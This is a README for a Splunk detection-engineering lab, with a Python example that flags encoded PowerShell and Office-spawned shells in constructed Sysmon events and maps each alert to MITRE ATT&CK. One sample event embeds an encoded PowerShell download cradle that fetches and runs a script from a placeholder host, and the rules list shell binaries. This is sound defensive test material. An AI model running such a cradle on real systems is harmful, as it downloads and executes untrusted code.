Jrodri5891/Splunk-Detection-Lab
# Splunk-Detection-Lab
Hands-on Splunk SIEM lab focused on detection engineering, threat hunting, SOC investigations, and real-world security monitoring using SPL queries and MITRE ATT&CK mapping.
# Overview
This repository contains practical Splunk projects, detections, dashboards, reports, threat hunting exercises, and security analysis scenarios designed to strengthen blue-team and SIEM skills.
The goals of this repository are to:
* Practice Splunk SPL and log analysis
* Build detection engineering workflows
* Simulate SOC investigations
* Develop threat hunting methodologies
* Improve SIEM monitoring and alerting skills
* Document hands-on cybersecurity projects and labs
* Map detections to the MITRE ATT&CK framework
This repository is part of my continued learning in:
* Splunk
* Detection Engineering
* Threat Hunting
* SOC Operations
* DFIR (Digital Forensics & Incident Response)
# Repository Content
Projects and content may include:
* SPL Queries
* Detection Rules
* Threat Hunting Exercises
* SOC Investigation Reports
* Dashboard Development
* Alert Creation
* Windows Event Log Analysis
* Sysmon Analysis
* IOC Hunting
* MITRE ATT&CK Mapping
* Security Visualizations
* Incident Response Scenarios
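As an added illustration of what a detection in such a lab looks like end to end (this is example code written for this page, not a detection from the repository), the block below runs two Sysmon-based detections over constructed Event ID 1 (process creation) records and tags each alert with its MITRE ATT&CK technique. Python is used instead of SPL so the logic can run offline; each rule carries the equivalent Splunk search as a string for reference. The field names (`EventCode`, `Image`, `ParentImage`, `CommandLine`) follow what the Sysmon add-on typically extracts, and `index=sysmon` in the SPL strings is an assumed index name. The alert for encoded PowerShell also decodes the `-EncodedCommand` payload (base64 of UTF-16LE), which is the enrichment an analyst wants before triage.

```python
import base64
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


def _encode_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry). Shape mimics Sysmon
# process-creation records as Splunk surfaces them; index/sourcetype
# names used in the SPL strings below are assumptions.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventCode": "1", "host": "WS01", "User": "CORP\\alice",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                    "-EncodedCommand " + _encode_powershell(SAMPLE_SCRIPT)},
    {"EventCode": "1", "host": "WS02", "User": "CORP\\bob",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventCode": "1", "host": "WS03", "User": "CORP\\carol",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe C:\\Users\\carol\\notes.txt"},
    # A network-connection event (ID 3) with no CommandLine; rules must ignore it.
    {"EventCode": "3", "host": "WS01", "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\svchost.exe"},
]

# -e, -ec, -en, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Detection:
    name: str
    technique_id: str   # MITRE ATT&CK technique the rule is mapped to
    spl: str            # equivalent Splunk search, for reference only
    match: Callable[[Dict[str, str]], bool]


def is_encoded_powershell(ev: Dict[str, str]) -> bool:
    return (ev.get("EventCode") == "1"
            and _basename(ev.get("Image", "")) in ("powershell.exe", "pwsh.exe")
            and ENCODED_RE.search(ev.get("CommandLine", "")) is not None)


def is_office_spawning_shell(ev: Dict[str, str]) -> bool:
    return (ev.get("EventCode") == "1"
            and _basename(ev.get("ParentImage", "")) in OFFICE_PARENTS
            and _basename(ev.get("Image", "")) in SHELLS)


DETECTIONS = [
    Detection("Encoded PowerShell command line", "T1059.001",
              'index=sysmon EventCode=1 Image="*\\powershell.exe" '
              '(CommandLine="* -enc *" OR CommandLine="* -EncodedCommand *")',
              is_encoded_powershell),
    Detection("Office application spawning a shell", "T1204.002",
              'index=sysmon EventCode=1 ParentImage IN ("*\\WINWORD.EXE","*\\EXCEL.EXE") '
              'Image IN ("*\\cmd.exe","*\\powershell.exe")',
              is_office_spawning_shell),
]


def run_detections(events: List[Dict[str, str]], detections=DETECTIONS) -> List[Dict[str, str]]:
    """Apply every detection to every event; return enriched, ATT&CK-tagged alerts."""
    alerts = []
    for ev in events:
        for det in detections:
            if det.match(ev):
                alert = {"detection": det.name, "technique": det.technique_id,
                         "host": ev.get("host"), "user": ev.get("User"),
                         "command_line": ev.get("CommandLine", "")}
                decoded = decode_encoded_command(alert["command_line"])
                if decoded is not None:
                    alert["decoded_command"] = decoded
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in run_detections(SAMPLE_EVENTS):
        print(f"[{a['technique']}] {a['detection']} on {a['host']} by {a['user']}")
        print("   ", a.get("decoded_command", a["command_line"]))
```

Running it stand-alone yields two alerts: the encoded PowerShell launch on WS01 (shown with the decoded download cradle) and WINWORD.EXE spawning cmd.exe on WS02. The notepad event and the Event ID 3 record are correctly ignored, which is the kind of negative case worth keeping in a lab's test data so a rule change that starts matching benign process creations is noticed.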
# Technologies Used
* Splunk Enterprise
* SPL (Search Processing Language)
* Windows Event Logs
* Sysmon
* MITRE ATT&CK Framework
* Wireshark
* DFIR Methodologies
* Blue-Team Detection Techniques
# Current Status
This repository is actively being expanded with new projects, detections, dashboards, reports, and security investigations as I continue developing hands-on SIEM and detection engineering skills.